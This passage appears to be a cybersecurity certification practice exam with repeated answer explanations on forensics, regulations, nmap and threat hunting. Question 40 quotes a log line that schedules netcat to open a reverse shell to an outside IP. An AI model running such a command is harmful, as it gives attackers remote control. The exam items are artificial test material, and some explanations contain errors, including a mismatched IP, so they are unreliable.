OBJ-3.1: In the above REGEX, the \b parameter identifies that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9_%+-]” is composed of upper or lower case alphanumeric symbols “_%+-.” After the first part of the word and the at sign (@) is specified, follows by another word ([A-Za-z0-9.-]), a period (\.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of [email protected] (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters). The option of http://www.diontraining.com is wrong because it does not have an @ sign in the string. The option of [email protected] is wrong because you cannot use a period before the @ symbol, only letters, numbers, and some specified symbols ( _ % + – ). The option of [email protected] is wrong because the last word (training) is longer than 6 characters in length. As a cybersecurity analyst, you must get comfortable creating regular expressions and understanding what type of output they generate.
Question 36 of 60
36. Question
What describes the infrastructure needed to support the other architectural domains in the TOGAF framework?
Correct
OBJ-5.3: TOGAF is a prescriptive framework that divides the enterprise architecture into four domains. Technical architecture describes the infrastructure needed to support the other architectural domains. Business architecture defines governance and organization and explains the interaction between enterprise architecture and business strategy. Applications architecture includes the applications and systems an organization deploys, the interactions between those systems, and their relation to the business processes. Data architecture provides the organization’s approach to storing and managing information assets. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Incorrect
OBJ-5.3: TOGAF is a prescriptive framework that divides the enterprise architecture into four domains. Technical architecture describes the infrastructure needed to support the other architectural domains. Business architecture defines governance and organization and explains the interaction between enterprise architecture and business strategy. Applications architecture includes the applications and systems an organization deploys, the interactions between those systems, and their relation to the business processes. Data architecture provides the organization’s approach to storing and managing information assets. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Unattempted
OBJ-5.3: TOGAF is a prescriptive framework that divides the enterprise architecture into four domains. Technical architecture describes the infrastructure needed to support the other architectural domains. Business architecture defines governance and organization and explains the interaction between enterprise architecture and business strategy. Applications architecture includes the applications and systems an organization deploys, the interactions between those systems, and their relation to the business processes. Data architecture provides the organization’s approach to storing and managing information assets. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Question 37 of 60
37. Question
You are conducting a forensic analysis of a hard disk and need to access a file that appears to have been deleted. Upon analysis, you have determined that the file’s data fragments exist scattered across the unallocated and slack space of the drive. Which technique could you use to recover the data?
Correct
OBJ-4.4: File carving is the process of extracting data from an image when that data has no associated file system metadata. A file-carving tool analyzes the disk at the sector/page level. It attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files, or at least bits of information from deleted files. File carving depends heavily on file signatures or magic numbers—the sequence of bytes at the start of each file identifies its type. Hashing is a function that converts an arbitrary length string input to a fixed-length string output. Overwrite is a method of writing random bits or all zeros over a hard disk to sanitize it. Recovery is a generic term in forensics, cybersecurity incident response, and other portions of the IT industry, therefore it is not specific enough to be the correct option.
Incorrect
OBJ-4.4: File carving is the process of extracting data from an image when that data has no associated file system metadata. A file-carving tool analyzes the disk at the sector/page level. It attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files, or at least bits of information from deleted files. File carving depends heavily on file signatures or magic numbers—the sequence of bytes at the start of each file identifies its type. Hashing is a function that converts an arbitrary length string input to a fixed-length string output. Overwrite is a method of writing random bits or all zeros over a hard disk to sanitize it. Recovery is a generic term in forensics, cybersecurity incident response, and other portions of the IT industry, therefore it is not specific enough to be the correct option.
Unattempted
OBJ-4.4: File carving is the process of extracting data from an image when that data has no associated file system metadata. A file-carving tool analyzes the disk at the sector/page level. It attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files, or at least bits of information from deleted files. File carving depends heavily on file signatures or magic numbers—the sequence of bytes at the start of each file identifies its type. Hashing is a function that converts an arbitrary length string input to a fixed-length string output. Overwrite is a method of writing random bits or all zeros over a hard disk to sanitize it. Recovery is a generic term in forensics, cybersecurity incident response, and other portions of the IT industry, therefore it is not specific enough to be the correct option.
Question 38 of 60
38. Question
During which phase of an attack would a penetration tester seek to gain complete control of a system?
Correct
OBJ-5.2: During the attack phase, the attacker seeks to gain access to a system, escalate that access to obtain complete control, and then conduct browsing to identify mechanisms to gain access to additional systems. The planning phase is where the assignment’s scope is defined, and management approvals, documents, and agreements are signed. The discovery phase is where the actual testing starts; it can be regarded as an information-gathering phase. The attack phase is at the heart of any penetration test; it is the part of the process where a penetration test attempts to exploit a system, conduct privilege escalation, and then pivot or laterally move around the network. The reporting phase is focused on developing the final report presented to management after the penetration test.
Incorrect
OBJ-5.2: During the attack phase, the attacker seeks to gain access to a system, escalate that access to obtain complete control, and then conduct browsing to identify mechanisms to gain access to additional systems. The planning phase is where the assignment’s scope is defined, and management approvals, documents, and agreements are signed. The discovery phase is where the actual testing starts; it can be regarded as an information-gathering phase. The attack phase is at the heart of any penetration test; it is the part of the process where a penetration test attempts to exploit a system, conduct privilege escalation, and then pivot or laterally move around the network. The reporting phase is focused on developing the final report presented to management after the penetration test.
Unattempted
OBJ-5.2: During the attack phase, the attacker seeks to gain access to a system, escalate that access to obtain complete control, and then conduct browsing to identify mechanisms to gain access to additional systems. The planning phase is where the assignment’s scope is defined, and management approvals, documents, and agreements are signed. The discovery phase is where the actual testing starts; it can be regarded as an information-gathering phase. The attack phase is at the heart of any penetration test; it is the part of the process where a penetration test attempts to exploit a system, conduct privilege escalation, and then pivot or laterally move around the network. The reporting phase is focused on developing the final report presented to management after the penetration test.
Question 39 of 60
39. Question
SkillCertPro Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. Previously, the consultants have won numerous contracts with financial services and publicly traded companies, but they are new to the healthcare industry. Which of the following laws must the consultants review to ensure the hospital and its customers are fully protected?
Correct
OBJ-5.1: The Health Insurance Portability and Accountability Act (HIPPA) was created primarily to modernize the flow of healthcare information, stipulate how Personally Identifiable Information maintained by the healthcare and healthcare insurance industries should be protected from fraud and theft, and address limitations on healthcare insurance coverage. This is a federal law that must be following in the United States. The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to explain their information-sharing practices to their customers and safeguard sensitive data. This includes companies that offer consumers financial products or services like loans, financial or investment advice, or insurance. The Sarbanes-Oxley Act of 2002 is a federal law that established sweeping auditing and financial regulations for public companies. Lawmakers created the legislation to help protect shareholders, employees, and the public from accounting errors and fraudulent financial practices. The Committee of Sponsoring Organizations of the Treadway Commission (COSO) provides guidance on various governance-related topics, including fraud, controls, finance, and ethics. COSO’s ERM-integrated framework defines risk, and related common terminology lists key components of risk management strategies and supplies direction and criteria for enhancing risk management practices.
Incorrect
OBJ-5.1: The Health Insurance Portability and Accountability Act (HIPPA) was created primarily to modernize the flow of healthcare information, stipulate how Personally Identifiable Information maintained by the healthcare and healthcare insurance industries should be protected from fraud and theft, and address limitations on healthcare insurance coverage. This is a federal law that must be following in the United States. The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to explain their information-sharing practices to their customers and safeguard sensitive data. This includes companies that offer consumers financial products or services like loans, financial or investment advice, or insurance. The Sarbanes-Oxley Act of 2002 is a federal law that established sweeping auditing and financial regulations for public companies. Lawmakers created the legislation to help protect shareholders, employees, and the public from accounting errors and fraudulent financial practices. The Committee of Sponsoring Organizations of the Treadway Commission (COSO) provides guidance on various governance-related topics, including fraud, controls, finance, and ethics. COSO’s ERM-integrated framework defines risk, and related common terminology lists key components of risk management strategies and supplies direction and criteria for enhancing risk management practices.
Unattempted
OBJ-5.1: The Health Insurance Portability and Accountability Act (HIPPA) was created primarily to modernize the flow of healthcare information, stipulate how Personally Identifiable Information maintained by the healthcare and healthcare insurance industries should be protected from fraud and theft, and address limitations on healthcare insurance coverage. This is a federal law that must be following in the United States. The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to explain their information-sharing practices to their customers and safeguard sensitive data. This includes companies that offer consumers financial products or services like loans, financial or investment advice, or insurance. The Sarbanes-Oxley Act of 2002 is a federal law that established sweeping auditing and financial regulations for public companies. Lawmakers created the legislation to help protect shareholders, employees, and the public from accounting errors and fraudulent financial practices. The Committee of Sponsoring Organizations of the Treadway Commission (COSO) provides guidance on various governance-related topics, including fraud, controls, finance, and ethics. COSO’s ERM-integrated framework defines risk, and related common terminology lists key components of risk management strategies and supplies direction and criteria for enhancing risk management practices.
Question 40 of 60
40. Question
You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines of code:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
sc config schedule start auto
net start schedule
at 10:42 “” c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe “”
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What BEST describes what is occurring and what action do you recommend to stop it?
Correct
OBJ-4.3: The code is setting up a task using Windows Task Scheduler (at). This task will run netcat (nc.exe) each day at the specified time (10:42). This is the netcat program and is being run from the c:\temp directory to create a reverse shell by executing the command shell (-e cmd.exe) and connecting it back to the attacker’s machine at 172.16.34.12 over port 443.
Incorrect
OBJ-4.3: The code is setting up a task using Windows Task Scheduler (at). This task will run netcat (nc.exe) each day at the specified time (10:42). This is the netcat program and is being run from the c:\temp directory to create a reverse shell by executing the command shell (-e cmd.exe) and connecting it back to the attacker’s machine at 172.16.34.12 over port 443.
Unattempted
OBJ-4.3: The code is setting up a task using Windows Task Scheduler (at). This task will run netcat (nc.exe) each day at the specified time (10:42). This is the netcat program and is being run from the c:\temp directory to create a reverse shell by executing the command shell (-e cmd.exe) and connecting it back to the attacker’s machine at 172.16.34.12 over port 443.
Question 41 of 60
41. Question
Which of the following classifications would apply to patents, copyrights, and trademarks?
Correct
OBJ-5.1: Patents, copyrights, and trademarks are all considered to be intellectual property. Trade secrets are considered proprietary and are not protected by governments. Personally identifiable information (PII) is any data that could be used to identify a particular person. Protected health information (PHI) is any information about health status, provision of health care, or payment for health care linked to a specific individual.
Incorrect
OBJ-5.1: Patents, copyrights, and trademarks are all considered to be intellectual property. Trade secrets are considered proprietary and are not protected by governments. Personally identifiable information (PII) is any data that could be used to identify a particular person. Protected health information (PHI) is any information about health status, provision of health care, or payment for health care linked to a specific individual.
Unattempted
OBJ-5.1: Patents, copyrights, and trademarks are all considered to be intellectual property. Trade secrets are considered proprietary and are not protected by governments. Personally identifiable information (PII) is any data that could be used to identify a particular person. Protected health information (PHI) is any information about health status, provision of health care, or payment for health care linked to a specific individual.
Question 42 of 60
42. Question
You are conducting an incident response and have already eradicated the malware from a victimized system. Which of the following actions should you perform as part of the recovery phase?
Correct
OBJ-4.2: Following an incident, all types of permissions should be reviewed and reinforced. This especially affects file and firewall ACLs and system privileges assigned to administrative user or group accounts. This is performed during the recovery phase. During the eradication phase, you would conduct sanitization, secure disposal, and reimaging.
Incorrect
OBJ-4.2: Following an incident, all types of permissions should be reviewed and reinforced. This especially affects file and firewall ACLs and system privileges assigned to administrative user or group accounts. This is performed during the recovery phase. During the eradication phase, you would conduct sanitization, secure disposal, and reimaging.
Unattempted
OBJ-4.2: Following an incident, all types of permissions should be reviewed and reinforced. This especially affects file and firewall ACLs and system privileges assigned to administrative user or group accounts. This is performed during the recovery phase. During the eradication phase, you would conduct sanitization, secure disposal, and reimaging.
Question 43 of 60
43. Question
You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first?
Correct
OBJ-4.4: When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first and the least volatile (least likely to change) last. You should always begin collecting the CPU registers and cache memory (L1/L2/L3/GPU). The contents of system memory (RAM), including a routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. Next, you would move onto the collection of data storage devices like hard drives, SSDs, and flash memory devices. After that, you would move onto less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.
Incorrect
OBJ-4.4: When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first and the least volatile (least likely to change) last. You should always begin collecting the CPU registers and cache memory (L1/L2/L3/GPU). The contents of system memory (RAM), including a routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. Next, you would move onto the collection of data storage devices like hard drives, SSDs, and flash memory devices. After that, you would move onto less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.
Unattempted
OBJ-4.4: When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first and the least volatile (least likely to change) last. You should always begin collecting the CPU registers and cache memory (L1/L2/L3/GPU). The contents of system memory (RAM), including a routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. Next, you would move onto the collection of data storage devices like hard drives, SSDs, and flash memory devices. After that, you would move onto less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.
Question 44 of 60
44. Question
What control provides the best protection against both SQL injection and cross-site scripting attacks?
Correct
OBJ-2.2: Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.
Incorrect
OBJ-2.2: Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.
Unattempted
OBJ-2.2: Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.
Question 45 of 60
45. Question
As a newly hired cybersecurity analyst, you are attempting to determine your organization’s current public-facing attack surface. Which of the following methodologies or tools generates a current and historical view of the company’s public-facing IP space?
Correct
OBJ-3.3: Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company’s public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company’s network. The nmap scanning tool can provide an analysis of the current state of public exposure but has no mechanism to determine the history, nor will it give the same depth of information that shodan.io provides. Google Hacking can determine if a public exposure occurred over public-facing protocols, but it cannot conclusively reveal all the exposures present. Google hacking relies on using advanced Google searches with advanced syntax to search for information across the internet. Network diagrams can show how a network was initially configured. Unless the diagrams are up-to-date, which they usually aren’t, they cannot show the current “as is” configuration. If you can only select one tool to find your attack surface’s current and historical view, shodan is your best choice.
Incorrect
OBJ-3.3: Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company’s public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company’s network. The nmap scanning tool can provide an analysis of the current state of public exposure but has no mechanism to determine the history, nor will it give the same depth of information that shodan.io provides. Google Hacking can determine if a public exposure occurred over public-facing protocols, but it cannot conclusively reveal all the exposures present. Google hacking relies on using advanced Google searches with advanced syntax to search for information across the internet. Network diagrams can show how a network was initially configured. Unless the diagrams are up-to-date, which they usually aren’t, they cannot show the current “as is” configuration. If you can only select one tool to find your attack surface’s current and historical view, shodan is your best choice.
Unattempted
OBJ-3.3: Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company’s public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company’s network. The nmap scanning tool can provide an analysis of the current state of public exposure but has no mechanism to determine the history, nor will it give the same depth of information that shodan.io provides. Google Hacking can determine if a public exposure occurred over public-facing protocols, but it cannot conclusively reveal all the exposures present. Google hacking relies on using advanced Google searches with advanced syntax to search for information across the internet. Network diagrams can show how a network was initially configured. Unless the diagrams are up-to-date, which they usually aren’t, they cannot show the current “as is” configuration. If you can only select one tool to find your attack surface’s current and historical view, shodan is your best choice.
Question 46 of 60
46. Question
You are conducting threat hunting on your organization’s network. Every workstation on the network uses the same configuration baseline and contains a 500 GB HDD, 4 GB of RAM, and the Windows 10 Enterprise operating system. You know from previous experience that most of the workstations only use 40 GB of space on the hard drives since most users save their files on the file server instead of the local workstation. You discovered one workstation that has over 250 GB of data stored on it. Which of the following is a likely hypothesis of what is happening, and how would you verify it?
Correct
OBJ-3.3: Based on your previous experience, you know that most workstations only store 40 GB of data. Since client workstations don’t usually need to store data locally, and you noticed that a host’s disk capacity has suddenly diminished, you believe it could indicate that it is used to stage data for exfiltration. To validate this hypothesis, you should configure monitoring and conduct volume-based trend analysis to see how much data is added over the next few hours or days. If you suspect the machine is the victim of a remote access trojan, you should not reimage it immediately. By reimaging the host, you would lose any evidence or the ability to confirm your hypothesis. Based on the scenario, you have no evidence that the system is offline or conducting backups locally. If you did suspect this, you could confirm this by checking the network connectivity or analyzing the files stored on the system. If you suspect the host used as a command and control (C2) node for a botnet, you should conduct network monitoring to validate your hypothesis before disconnecting the host from the network. If the host were a C2 node, that would not explain the excessive use of disk space observed.
Incorrect
OBJ-3.3: Based on your previous experience, you know that most workstations only store 40 GB of data. Since client workstations don’t usually need to store data locally, and you noticed that a host’s disk capacity has suddenly diminished, you believe it could indicate that it is used to stage data for exfiltration. To validate this hypothesis, you should configure monitoring and conduct volume-based trend analysis to see how much data is added over the next few hours or days. If you suspect the machine is the victim of a remote access trojan, you should not reimage it immediately. By reimaging the host, you would lose any evidence or the ability to confirm your hypothesis. Based on the scenario, you have no evidence that the system is offline or conducting backups locally. If you did suspect this, you could confirm this by checking the network connectivity or analyzing the files stored on the system. If you suspect the host used as a command and control (C2) node for a botnet, you should conduct network monitoring to validate your hypothesis before disconnecting the host from the network. If the host were a C2 node, that would not explain the excessive use of disk space observed.
Unattempted
OBJ-3.3: Based on your previous experience, you know that most workstations only store 40 GB of data. Since client workstations don’t usually need to store data locally, and you noticed that a host’s disk capacity has suddenly diminished, you believe it could indicate that it is used to stage data for exfiltration. To validate this hypothesis, you should configure monitoring and conduct volume-based trend analysis to see how much data is added over the next few hours or days. If you suspect the machine is the victim of a remote access trojan, you should not reimage it immediately. By reimaging the host, you would lose any evidence or the ability to confirm your hypothesis. Based on the scenario, you have no evidence that the system is offline or conducting backups locally. If you did suspect this, you could confirm this by checking the network connectivity or analyzing the files stored on the system. If you suspect the host used as a command and control (C2) node for a botnet, you should conduct network monitoring to validate your hypothesis before disconnecting the host from the network. If the host were a C2 node, that would not explain the excessive use of disk space observed.
Question 47 of 60
47. Question
What is a reverse proxy commonly used for?
Correct
OBJ-1.6: A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users’ devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the server’s response back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.
Incorrect
OBJ-1.6: A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users’ devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the server’s response back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.
Unattempted
OBJ-1.6: A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users’ devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the server’s response back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.
Question 48 of 60
48. Question
Which of the following is not a recognized adversarial attack vector according to the MITRE ATT&CK framework?
Correct
OBJ-2.1: Cyber, human, and physical are all recognized adversarial attack vectors in the framework. While the information may be exchanged in all of these factors, the term is too generic to uniquely describe any given attack vector under the MITRE ATT&CK framework. Cyber is the use of hardware or software IT systems. Human is the use of social engineering, coercion, impersonation, or force. Physical relies on gaining local access.
Incorrect
OBJ-2.1: Cyber, human, and physical are all recognized adversarial attack vectors in the framework. While the information may be exchanged in all of these factors, the term is too generic to uniquely describe any given attack vector under the MITRE ATT&CK framework. Cyber is the use of hardware or software IT systems. Human is the use of social engineering, coercion, impersonation, or force. Physical relies on gaining local access.
Unattempted
OBJ-2.1: Cyber, human, and physical are all recognized adversarial attack vectors in the framework. While the information may be exchanged in all of these factors, the term is too generic to uniquely describe any given attack vector under the MITRE ATT&CK framework. Cyber is the use of hardware or software IT systems. Human is the use of social engineering, coercion, impersonation, or force. Physical relies on gaining local access.
Question 49 of 60
49. Question
You are a cybersecurity analyst who has been given the output from a system administrator’s Linux terminal. Based on the output provided, which of the following statements is correct?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BEGIN OUTPUT
——————————
# nmap win2k16.local
Nmap scan report for win2k16 (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# nc win2k16.local 80
220 win2k16.local SkillCertProTraining SMTP Server (Postfix/2.4.1)
# nc win2k16.local 22
SSH-2.0-OpenSSH_7.2 Debian-2
#
——————————
END OUTPUT
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Correct
OBJ-3.1: As shown in the nmap scans’ output, only two standard ports being utilized: 22 (SSH) and 80 (HTTP). But, when netcat is run against port 80, the banner provided shows the SMTP server is running on port 80. SMTP is normally run on port 25 by default, so running it on port 80 means your email server (SMTP) runs on a non-standard port.
Incorrect
OBJ-3.1: As shown in the nmap scans’ output, only two standard ports being utilized: 22 (SSH) and 80 (HTTP). But, when netcat is run against port 80, the banner provided shows the SMTP server is running on port 80. SMTP is normally run on port 25 by default, so running it on port 80 means your email server (SMTP) runs on a non-standard port.
Unattempted
OBJ-3.1: As shown in the nmap scans’ output, only two standard ports being utilized: 22 (SSH) and 80 (HTTP). But, when netcat is run against port 80, the banner provided shows the SMTP server is running on port 80. SMTP is normally run on port 25 by default, so running it on port 80 means your email server (SMTP) runs on a non-standard port.
Question 50 of 60
50. Question
Richard attempted to visit a website and received a DNS response from the DNS cache server pointing to the wrong IP address. Which of the following attacks has occurred?
Correct
OBJ-3.1: DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites. MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network using layer 2 address information. DNS brute-forcing is used to check for wildcard entries using a dictionary or wordlist. This technique is used when a DNS zone transfer is not allowed by a system.
Incorrect
OBJ-3.1: DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites. MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network using layer 2 address information. DNS brute-forcing is used to check for wildcard entries using a dictionary or wordlist. This technique is used when a DNS zone transfer is not allowed by a system.
Unattempted
OBJ-3.1: DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites. MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network using layer 2 address information. DNS brute-forcing is used to check for wildcard entries using a dictionary or wordlist. This technique is used when a DNS zone transfer is not allowed by a system.
Question 51 of 60
51. Question
Which of the following types of data breaches would require that the US Department of Health and Human Services and the media be notified if more than 500 individuals are affected by a data breach?
Correct
OBJ-5.1: Protected health information (PHI) is defined as any information that identifies someone as the subject of medical and insurance records, plus their associated hospital and laboratory test results. This type of data is protected by the Health Insurance Portability and Accountability Act (HIPPA). It requires notification of the individual, the Secretary of the US Department of Health and Human Services (HHS), and the media (if more than 500 individuals are affected) in the case of a data breach. Personally identifiable information (PII) is any data that can be used to identify, contact, or impersonate an individual. Credit card information is protected under the PCI DSS information security standard. Trade secret information is protected by the organization that owns those secrets.
Incorrect
OBJ-5.1: Protected health information (PHI) is defined as any information that identifies someone as the subject of medical and insurance records, plus their associated hospital and laboratory test results. This type of data is protected by the Health Insurance Portability and Accountability Act (HIPPA). It requires notification of the individual, the Secretary of the US Department of Health and Human Services (HHS), and the media (if more than 500 individuals are affected) in the case of a data breach. Personally identifiable information (PII) is any data that can be used to identify, contact, or impersonate an individual. Credit card information is protected under the PCI DSS information security standard. Trade secret information is protected by the organization that owns those secrets.
Unattempted
OBJ-5.1: Protected health information (PHI) is defined as any information that identifies someone as the subject of medical and insurance records, plus their associated hospital and laboratory test results. This type of data is protected by the Health Insurance Portability and Accountability Act (HIPPA). It requires notification of the individual, the Secretary of the US Department of Health and Human Services (HHS), and the media (if more than 500 individuals are affected) in the case of a data breach. Personally identifiable information (PII) is any data that can be used to identify, contact, or impersonate an individual. Credit card information is protected under the PCI DSS information security standard. Trade secret information is protected by the organization that owns those secrets.
Question 52 of 60
52. Question
Which of the following is the default nmap scan type when you do not provide a flag when issuing the command?
Correct
OBJ-1.4: By default, Nmap performs an SYN Scan, though it substitutes a connect scan if the user does not have proper privileges to send raw packets (requires root access on Unix). A UDP scan requires the -sU flag to be issued when launching a nmap scan. A TCP FIN scan requires the -sF flag to be issued when launching a nmap scan.
Incorrect
OBJ-1.4: By default, Nmap performs an SYN Scan, though it substitutes a connect scan if the user does not have proper privileges to send raw packets (requires root access on Unix). A UDP scan requires the -sU flag to be issued when launching a nmap scan. A TCP FIN scan requires the -sF flag to be issued when launching a nmap scan.
Unattempted
OBJ-1.4: By default, Nmap performs an SYN Scan, though it substitutes a connect scan if the user does not have proper privileges to send raw packets (requires root access on Unix). A UDP scan requires the -sU flag to be issued when launching a nmap scan. A TCP FIN scan requires the -sF flag to be issued when launching a nmap scan.
Question 53 of 60
53. Question
Marta’s organization is concerned with the vulnerability of a user’s account being vulnerable for an extended period of time if their password was compromised. Which of the following controls should be configured as part of their password policy to minimize this vulnerability?
Correct
OBJ-5.3: A password expiration control in the policy would force users to change their password at specific time intervals. This will then locks out a user who types in the incorrect password or create an alter that the user’s account has been potentially compromised. While the other options are good components of password security to prevent an overall compromise, they are not effective against the vulnerability described in this particular scenario. It states the issue is based on time. Password history is used to determine the number of unique passwords a user must use before using an old password again. The Passwords must meet complexity requirements policy setting determines whether passwords must meet a series of guidelines that are considered important for a strong password. Maximum password length creates a limit to how long the password can be, but a longer password is considered stronger against a brute force attack.
Incorrect
OBJ-5.3: A password expiration control in the policy would force users to change their password at specific time intervals. This will then locks out a user who types in the incorrect password or create an alter that the user’s account has been potentially compromised. While the other options are good components of password security to prevent an overall compromise, they are not effective against the vulnerability described in this particular scenario. It states the issue is based on time. Password history is used to determine the number of unique passwords a user must use before using an old password again. The Passwords must meet complexity requirements policy setting determines whether passwords must meet a series of guidelines that are considered important for a strong password. Maximum password length creates a limit to how long the password can be, but a longer password is considered stronger against a brute force attack.
Unattempted
OBJ-5.3: A password expiration control in the policy would force users to change their password at specific time intervals. This will then locks out a user who types in the incorrect password or create an alter that the user’s account has been potentially compromised. While the other options are good components of password security to prevent an overall compromise, they are not effective against the vulnerability described in this particular scenario. It states the issue is based on time. Password history is used to determine the number of unique passwords a user must use before using an old password again. The Passwords must meet complexity requirements policy setting determines whether passwords must meet a series of guidelines that are considered important for a strong password. Maximum password length creates a limit to how long the password can be, but a longer password is considered stronger against a brute force attack.
Question 54 of 60
54. Question
A vulnerability scan has returned the following results:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Detailed Results
10.56.17.21 (APACHE-2.4)
Windows Shares
Category: Windows
CVE ID: –
